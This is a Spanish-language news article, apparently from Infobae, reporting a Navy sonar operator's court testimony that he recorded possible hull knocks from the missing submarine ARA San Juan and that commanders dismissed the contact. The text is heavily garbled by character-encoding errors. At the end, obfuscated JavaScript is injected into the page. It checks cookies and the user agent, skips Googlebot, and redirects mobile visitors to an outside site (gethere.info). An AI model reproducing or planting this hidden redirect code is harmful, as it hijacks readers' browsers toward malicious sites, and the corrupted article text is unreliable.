Un testigo asegura haber registrado en su sonar golpes de cascos

Infobae accediA? a la declaraciA?n de un sonarista de una de las corbetas que participA? en el operativo de bA?squeda.

La declaraciA?n sorprendiA? a la jueza federal de Caleta Olivia, Marta YaAi??ez. Los dichos figuran a partir de la foja 1.527 y fue volcada al expediente el pasado 16 de abril. De corroborarse esos dichos con otros protagonistas de la historia, la causa por la desapariciA?n del ARA San Juan con sus 44 tripulantes podrAi??a dar un giro insospechado. Un suboficial sonarista de una de las Corbetas de la Armada Argentina que participA? en el operativo de bA?squeda y rescate del submarino jurA? que el martes 21 de noviembre de 2017, seis dAi??as despuAi??s de la desapariciA?n del sumergible, escucharon, registraron y grabaron “unos golpes de casco” y una detecciA?n en el registro del sonar “que reunAi??a muchas condiciones para ser un submarino”.

“El golpe de casco se hace con algA?n elemento metA?lico fuerte. No seguAi??a un ritmo para que nosotros pensemos que fuese un motor o algo, y ningA?n animal puede hacer un sonido de ese tipo”, dijo y afirmA? que el Comando de Adiestramiento y Alistamiento (COAA), por entonces a cargo del Contraalmirante Luis Enrique LA?pez Mazzeo, enviA? al destructor Almirante Brown “para que corrobore el posible contacto (con el ARA San Juan) porque tiene mejor sonar y a nosotros nos solicitaron que nos corramos del lugar”.

ai??i??A?Y el destructor Brown detectA? algo?, le preguntA? la jueza al militar.

ai??i??En ese momento tambiAi??n escuchan el contacto. TambiAi??n lo califican como posible SUB (submarino) y confirman que escuchan golpes de casco. A raAi??z de ello se solicitA? al Comando otro medio de bA?squeda. En ese momento estA?bamos buscando un submarino posiblemente asentado. En ese primer contacto estA?bamos a unos 300/400 metros de profundidad. Estuvimos aproximadamente 48 horas ahAi?? y despuAi??s una orden del COOA que nos destaca a otra posiciA?n y al Brown tambiAi??n lo enviaron a otro lado. A nosotros nos llamA? mucho la atenciA?n. DespuAi??s si fue alguien a ese lugar no lo sAi??, pero en ese momento no llegA? nadie mA?s al lugar. La colaboraciA?n internacional llegA? despuAi??s.

El suboficial que declarA? durante cuatro horas ante la jueza solicitA? que se preservara su nombre por temor a represalias dentro de la Armada. De todos modos, sus datos personales quedaron asentados en la primera foja de su exposiciA?n judicial.

Por esa razA?n Infobae no reproduce su apellido y la embarcaciA?n en la que se desempeAi??aba cuando realizA?, segA?n su opiniA?n profesional, un posible “contacto” con los tripulantes del submarino que habrAi??an estado golpeando el caso del ARA San Juan como seAi??al de socorro, ya que no tenAi??an otra forma de comunicaciA?n.

La pericia del suboficial sonarista, que implica ser los oAi??dos y los ojos de la unidad de superficie bajo el mar, estA? probada. Tiene experiencia en la Armada Argentina como sonarista de 17 aAi??os, segA?n consta en su foja de servicio. Se desempeAi??a como “supervisor de sonar”, aunque durante la bA?squeda del ARA San Juan, se desempeAi??o como “operador de sonar”. El marino llegA? a la causa de la mano de Luis Tagliapietra, el representante de la principal querella y padre de Alejandro, uno de los 44 desaparecidos.

El sonarista le explicA? a la magistrada que su especialidad es “escuchar a un submarino” y detallA? que “cuando el sonar detecta un posible contacto, se ve en la pantalla un punto que de acuerdo con su intensidad puede tener alguna relevancia, como lo fue en este caso”.

El capitA?n Enrique Balbi, el vocero de la Armada, nunca informA? sobre este supuesto contacto con los tripulantes del San Juan.

Infobae, por fuentes de la Armada, confirmA? que desde la Corbeta en la que se desempeAi??aba el testigo, se emitiA? un Mensaje Naval, con el posible contacto. Y que lo mismo ocurriA? con el Almirante Brown. Sin embargo, desestimaron la informaciA?n y no continuaron la bA?squeda en ese “cajA?n”, es decir la zona que tenAi??a delimitada la embarcaciA?n porque el Comando de Adiestramiento y Alistamiento, despuAi??s de enviar la grabaciA?n de esos sonidos a los Estados Unidos, se descartA? que fuese del buque de guerra desaparecido.

Con pesar, el sonarista se lo contA? asAi?? a la jueza YaAi??ez: “Nuestro Comandante no descartA? la informaciA?n, sino que la enviA? al COOA y el COOA (a cargo de LA?pez Mazzeo) es el que la descarta. En ese momento solo nos mandaron a otro lugar, pero sin ningA?n tipo de fundamento. No me consta que haya habido algA?n otro buque investigando en la zona del posible contacto”.

ai??i??A?QuAi?? le dijeron sobre los sonidos que grabaron?, quisieron saber desde el juzgado.

ai??i??El CapitA?n me dijo que segA?n le explicaron a Ai??l, los audios habAi??an sido analizados y enviados posteriormente a los Estados Unidos. Pero eso no me convenciA?. En ese momento le dicen al comandante (de la Corbeta que detectA? el supuesto contacto con el San Juan) que lo que nosotros escuchamos fueron mini drones americanos que supuestamente estA?n ahAi?? para medir condiciones meteorolA?gicas.

ai??i??A?Y antes o despuAi??s de ese dAi??a, habAi??an escuchado esos mismos ruidos?, preguntA? el abogado Tagliapietra.

ai??i??No. Nunca. Para mAi?? eran golpes de casco de submarino, respondiA? de manera tajante el testigo.

ai??i??A?Tiene para aportar material probatorio?, insistiA? la querella.

ai??i??SAi??, tengo el informe de los contactos y hay archivos de audio de los golpes de casco que tomAi?? durante mi turno. Esas grabaciones son archivos confidenciales que tienen que estar en la Corbeta. Las comunicaciones del contacto sonar en el momento de la bA?squeda se informA? con un Mensaje Naval, con la posiciA?n, el grado de confianza, que en este caso era alto, y alguna caracterAi??stica especial, en ese caso, los golpes de casco. Esa informaciA?n la bajAi?? en mi pen drive que es lo que aportA?.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge 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